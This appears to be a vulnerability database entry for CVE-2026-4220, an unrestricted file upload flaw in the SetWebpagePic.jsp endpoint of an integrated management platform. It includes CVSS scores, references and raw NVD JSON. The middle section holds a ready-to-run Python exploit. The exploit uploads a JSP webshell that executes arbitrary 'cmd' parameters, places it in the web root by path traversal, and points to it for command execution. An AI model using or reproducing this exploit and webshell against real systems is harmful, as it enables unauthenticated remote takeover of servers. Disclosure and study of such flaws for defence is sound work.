CVE-2026-4220

Description

A vulnerability has been found in Technologies Integrated Management Platform 7.17.0. Affected by this issue is some unknown functionality of the file /SetWebpagePic.jsp. The manipulation of the argument targetPath/Suffix leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Technologies Integrated Management Platform 7.17.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-4220 PoC - Technologies Integrated Management Platform Unrestricted File Upload
# Target: /SetWebpagePic.jsp

def exploit(target_url, file_path):
    """
    Exploit for CVE-2026-4220
    Upload malicious JSP file to target server
    """
    url = f"{target_url}/SetWebpagePic.jsp"
    
    # Malicious JSP webshell
    payload = """<%@ page import="java.io.*" %>
<% if(request.getParameter("cmd") != null) {
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while((line = br.readLine()) != null) {
        out.println(line);
    }
}%>"""
    
    files = {
        'file': ('shell.jsp', payload, 'application/octet-stream')
    }
    
    data = {
        'targetPath': '../webapps/root/',
        'Suffix': '.jsp'
    }
    
    try:
        response = requests.post(url, files=files, data=data, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        print("[*] Check uploaded file at: /shell.jsp?cmd=whoami")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <file_path>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4220
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4220
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4220/
[4] VulDB https://vuldb.com/cve/CVE-2026-4220
[5] https://my.feishu.cn/docx/EA9HdaXaQo80yTxKdw0c3UDmnmD?from=from_copylink
[6] https://vuldb.com/?ctiid.351144
[7] https://vuldb.com/?id.351144
[8] https://vuldb.com/?submit.770523

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4220", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:13.107", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Technologies Integrated Management Platform 7.17.0. Affected by this issue is some unknown functionality of the file /SetWebpagePic.jsp. The manipulation of the argument targetPath/Suffix leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad ha sido encontrada en la Plataforma de Gestión Integrada de Tecnologías 7.17.0. Afectada por este problema es alguna funcionalidad desconocida del archivo /SetWebpagePic.jsp. La manipulación del argumento targetPath/Suffix conduce a una carga sin restricciones. El ataque puede ser iniciado remotamente. El exploit ha sido divulgado al público y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://my.feishu.cn/docx/EA9HdaXaQo80yTxKdw0c3UDmnmD?from=from_copylink", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351144", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351144", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770523", "source": "[email protected]"}]}}